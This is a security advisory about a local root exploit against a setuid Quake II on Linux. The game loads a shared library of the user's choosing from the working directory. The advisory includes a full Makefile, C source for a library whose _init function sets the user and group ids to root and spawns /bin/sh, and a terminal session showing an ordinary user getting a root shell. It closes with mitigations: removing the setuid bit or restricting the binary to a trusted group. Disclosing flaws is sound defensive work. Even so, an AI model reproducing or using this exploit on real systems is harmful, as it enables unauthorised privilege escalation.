COMMAND
Quake II
SYSTEMS AFFECTED
Linux (Others?)
PROBLEM
'kevingeo' posted the following. Anyone who made Quake2 setuid root
in order to use the svgalib software refresh is vulnerable.
Quake2 uses dlopen(3) to load its graphics code (which is in a
separate shared library). dlopen calls the _init function (if
applicable) before it returns. Quake2 allows you to set which
refresh driver to use on the command line, and loads the .so file
from the working directory. The exploit is a shared library with
one function: _init. It sets the uid and gid to 0, and spawns a
shell.
nop@chrome:~/ref_root> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~/ref_root> make
gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
ld -m elf_i386 -shared -o ref_root.so -soname ref_root
/usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
couldn't exec default.cfg
couldn't exec config.cfg
Console initialized.
------- Loading ref_root.so -------
sh-2.00#
sh-2.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.00#
Exploit follows:
--Makefile--
all: ref_root lib

# Compile as position-independent code so it can go into a shared object.
ref_root:
	gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC

# Link with ld directly (no crti.o/crtn.o) so the library's own _init is
# the one the dynamic loader runs on dlopen, rather than the libc stub.
lib: ref_root.o /usr/lib/crtendS.o /usr/lib/crtbeginS.o
	ld -m elf_i386 -shared -o ref_root.so -soname ref_root /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
--End of Makefile--
--ref_root.c--
/* ref_root (quake2 exploit) copyright (c) 1998 Kevin George */
#include <unistd.h>
#include <stdlib.h>

/* Called by the dynamic loader from inside dlopen(), i.e. while quake2
 * is still running with euid 0.  (On current toolchains the equivalent
 * hook is a function marked __attribute__((constructor)).) */
int _init() {
    char *sh[2];
    sh[0] = "/bin/sh";
    sh[1] = NULL;
    /* Make the real and saved ids root as well, so the shell keeps root. */
    setuid(0);
    setgid(0);
    seteuid(0);
    execve(sh[0], sh, NULL);
    return 0;   /* only reached if execve() failed */
}
--End of ref_root.c--
SOLUTION
chmod u-s quake2
and use ref_softx (the X11 software refresh, which needs no root)
instead of ref_soft. Until a real fix is available, a better interim
measure is to keep the setuid bit but restrict who may run the
binary: create a group for trusted people (call it trusted, or
console, or whatever) and make the binary executable only by root
and that group:
chown root:trusted quake2
chmod 4750 quake2
Members of that group can still become root with the exploit above,
so "trusted" has to mean exactly that. The svgalib refresh cannot
run inside an X window, so limiting the game to trusted people is
more proportionate than removing the setuid bit and (essentially)
the game along with it.